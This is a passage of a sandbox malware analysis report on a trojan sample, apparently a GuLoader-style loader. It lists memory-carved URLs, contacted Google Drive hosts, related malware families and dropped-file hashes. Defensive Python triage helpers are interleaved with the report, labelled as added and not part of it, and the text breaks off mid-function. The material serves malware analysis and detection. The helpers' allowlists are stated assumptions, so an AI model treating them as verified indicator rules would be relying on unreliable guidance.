        https://www.msn.com/en-us/money/markets?id=a3oxnm | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/feed | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/play/games/drift-boss | explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
        https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they- | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://excel.office.com | explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000626000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In | explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        http://schemas.micro | explorer.exe, 00000005.00000000.91563709105.000000000A9E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558832216.00000000032F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.94448609733.0000000009DD0000.00000002.00000001.00040000.00000000.sdmp | false | | unknown
        http://www.gopher.ftp://ftp. | PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
        https://powerpoint.office.comEM | explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://aka.ms/odirm | explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004096261.00000000098DB000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.google.com | PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | PEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://drive.google.com/ | PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef | explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://outlook.com~0 | explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3 | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
        https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://apis.google.com | PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ocsp.quovadisoffshore.com0 | PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv | explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/markets?id=a33k6h | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9 | explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m | explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/markets?id=a6qja2 | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar- | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://word.office.comF0 | explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.google.com/ | PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        http://nsis.sf.net/NSIS_ErrorError | PEDIDO-144797.exe | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.glamour.com/story/shag-haircut-photos-products | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar- | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                                                                                            https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1pexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonellaexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/play/games/cut-explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/Wexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.instyle.com/hair/shag-haircut-face-shapeexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.quovadis.bm0PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://cdn.query.fexplorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://api.msn.com/explorer.exe, 00000005.00000000.91561655678.00000000097EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.00000000097EF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&ocexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
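The table above mixes two very different kinds of string: URLs carved from the memory of the analysed sample (PEDIDO-144797.exe) and URLs carved from explorer.exe, the process the sample injected into, whose memory also holds the shell's own MSN news and weather feed. The Source column is the only thing that separates them. The following helper, added here as an example and not part of the Joe Sandbox report or product, parses that column, attributes each URL to its process, and buckets it for triage. The input rows are copied from the table; the domain allowlist, the "static artifact" markers and the reading of the dump-id fields are this example's assumptions.

```python
"""Attribute each URL in a sandbox 'URLs from memory' table to the process
whose memory it was carved from, so strings from an injected host process
(here explorer.exe) are not mistaken for the sample's own indicators.

Added example, not part of the Joe Sandbox report or product.  Input rows
are copied from the report's table; the allowlists and the dump-id field
layout below are this example's assumptions.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SAMPLE = "PEDIDO-144797.exe"       # the analysed sample (from the report)
INJECTED_HOST = "explorer.exe"      # process the sample injected into (from the report)

# Assumption: domains the Windows shell itself fetches for taskbar news/weather.
# URLs found only in explorer.exe memory under these suffixes are treated as noise.
HOST_NOISE_SUFFIXES = ("msn.com",)

# Assumption: hosts that appear as build or library artifacts inside binaries,
# not as endpoints the sample contacts.
STATIC_MARKERS = ("nsis.sf.net", "www.w3c.org")


@dataclass
class UrlRecord:
    url: str
    processes: set = field(default_factory=set)   # process names seen in Source
    dumps: list = field(default_factory=list)     # (process, dump id) pairs


def parse_source(url: str, source: str) -> UrlRecord:
    """Source column is 'proc, dumpid, proc, dumpid, ...' or a bare process name
    (a bare name means the string was found in the file on disk, not in memory)."""
    rec = UrlRecord(url)
    current = None
    for tok in (t.strip() for t in source.split(",")):
        if tok.endswith(".sdmp"):
            if current is None:
                raise ValueError(f"dump id without a preceding process: {tok}")
            rec.dumps.append((current, tok))
        else:
            current = tok
            rec.processes.add(tok)
    return rec


def dump_address(dump_id: str) -> int:
    """Assumption: the fourth dotted field of a dump id is the hex base address
    of the dumped region, so hits can be grouped by memory region."""
    return int(dump_id.split(".")[3], 16)


def _matches(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(rec: UrlRecord) -> str:
    host = urlsplit(rec.url).hostname or ""
    if _matches(host, STATIC_MARKERS):
        return "static-artifact"
    if SAMPLE in rec.processes:
        return "sample"                  # carried by the sample itself: review first
    if rec.processes == {INJECTED_HOST} and _matches(host, HOST_NOISE_SUFFIXES):
        return "host-noise"
    return "review"                      # injected-host memory, domain not allowlisted


def triage(rows):
    """Group (url, source) rows by class, preserving table order."""
    groups = {"sample": [], "static-artifact": [], "host-noise": [], "review": []}
    for url, source in rows:
        groups[classify(parse_source(url, source))].append(url)
    return groups


# Rows copied from the report's table (truncated URLs left as the report shows them).
ROWS = [
    ("https://drive.usercontent.google.com/",
     "PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, "
     "PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp"),
    ("http://nsis.sf.net/NSIS_ErrorError", "PEDIDO-144797.exe"),
    ("https://www.glamour.com/story/shag-haircut-photos-products",
     "explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp"),
    ("https://api.msn.com/",
     "explorer.exe, 00000005.00000000.91561655678.00000000097EF000.00000004.00000001.00020000.00000000.sdmp, "
     "explorer.exe, 00000005.00000002.94446111895.00000000097EF000.00000004.00000001.00020000.00000000.sdmp"),
    ("http://www.quovadis.bm0",
     "PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp"),
]

if __name__ == "__main__":
    for cls, urls in triage(ROWS).items():
        print(f"{cls}:")
        for u in urls:
            print(f"  {u}")
```

Only the "sample" bucket is a candidate for indicators; the trailing "0" in http://www.quovadis.bm0 shows these are raw carved strings, so even that bucket needs a human pass before anything is blocked. The "review" bucket (a glamour.com URL found only in explorer.exe) is where a tuned allowlist pays off: unlisted domains stay visible rather than being silently dropped with the MSN feed noise.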
[Map of contacted IPs by country (image not included); legend buckets: share of IPs under 25%, 25% to 50%, 50% to 75%, over 75%]
IP | Domain | Country | ASN | ASN Name | Malicious
142.251.40.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.80.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1525501
                                                                                                                      Start date and time:2024-10-04 10:48:02 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 17m 51s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                      Run name:Suspected Instruction Hammering
Number of new started processes analysed:4
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:PEDIDO-144797.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winEXE@5/8@2/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 91%
                                                                                                                      • Number of executed functions: 74
                                                                                                                      • Number of non-executed functions: 272
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:51:59 | API Interceptor | 11242843x Sleep call for process: SecEdit.exe modified
04:57:50 | API Interceptor | 19x Sleep call for process: explorer.exe modified
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      No context
Associated Sample Name / URL | Detection | Threat Name | Context (shared IPs)
37f463bf4616ecd445d4a1937da06e19-pdf.bat.exe | malicious | FormBook | 142.250.80.97, 142.251.40.206
TERMENII CONTRACTULUI (ACORD NOU#U0102 COMAND#U0102)-pdf.bat.exe | malicious | FormBook, GuLoader | 142.250.80.97, 142.251.40.206
Cotizaci#U00f3n#12643283.exe | malicious | GuLoader | 142.250.80.97, 142.251.40.206
BnxBRWQWhy.exe | malicious | Stealc, Vidar | 142.250.80.97, 142.251.40.206
file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 142.250.80.97, 142.251.40.206
file.exe | malicious | LummaC, Vidar | 142.250.80.97, 142.251.40.206
NJna3TEAEr.exe | malicious | Stealc, Vidar | 142.250.80.97, 142.251.40.206
rpedido-002297.exe | malicious | FormBook, GuLoader | 142.250.80.97, 142.251.40.206
app__v7.5.3_.msi | malicious | Unknown | 142.250.80.97, 142.251.40.206
WarzoneCheat.exe | malicious | CredGrabber, Meduza Stealer | 142.250.80.97, 142.251.40.206
Match: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
rpedido-002297.exe | malicious | FormBook, GuLoader
rpedido-002297.exe | malicious | GuLoader
FACTURA-002297.exe | malicious | FormBook, GuLoader
FACTURA-002297.exe | malicious | GuLoader
LisectAVT_2403002A_41.exe | malicious | GuLoader
LisectAVT_2403002A_41.exe | malicious | GuLoader
Inventory_list.img.exe | malicious | GuLoader
Inventory_list.img.exe | malicious | GuLoader
sF2s1EQU7T.exe | malicious | Remcos, GuLoader
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 128.000000
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1351482
                                                                                                                                        Entropy (8bit):3.8030631093315117
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:XUR9g6MjY8GxRAdKo0osUCB2EEwHDU0A0K:me9iksZDUrR
                                                                                                                                        MD5:8E04282016EA8D1111880479A030A8A6
                                                                                                                                        SHA1:059CCFFC09B8E61970C6EBDBCE89149A062391AC
                                                                                                                                        SHA-256:27872B886B7698DC8022D1C6778718078943618129B34243B01423CDAC666399
                                                                                                                                        SHA-512:1644DE47AD5EEBAC529A27DF4A9913B76BF59DFFFDC3D171D236001F4E314E66937924D39C808F6D5D610E40F17E4C292676A1FA6D387C439D22BE16A403301E
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:.9......,.......................`).......8......j9..........................................................................................................................................................................................................................................G...J...............j...............................................................................................................................U...............*.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
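The "File Type" line above is libmagic's guess from the first bytes, and for an untyped 1.3 MB blob it is not informative; the entropy figure (3.80 bits per byte) together with the preview, which is mostly NUL bytes, says more about the file. The following script, added here as an example and not part of the Joe Sandbox report, recomputes the size, hash and 8-bit entropy fields the report prints for a dropped file and adds an explicit MZ/PE signature check for when the magic label looks wrong. Inputs are constructed inline; the entropy thresholds are rules of thumb chosen for this example, and ssdeep is not reproduced because it needs the external ssdeep library.

```python
"""Recompute the per-file fields a sandbox reports for a dropped file (size,
hashes, 8-bit entropy) and check whether a blob is really a PE, independent of
the libmagic 'File Type' guess.

Added example, not part of the Joe Sandbox report.  Inputs are constructed
inline; the entropy thresholds are rules of thumb chosen for this example.
"""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
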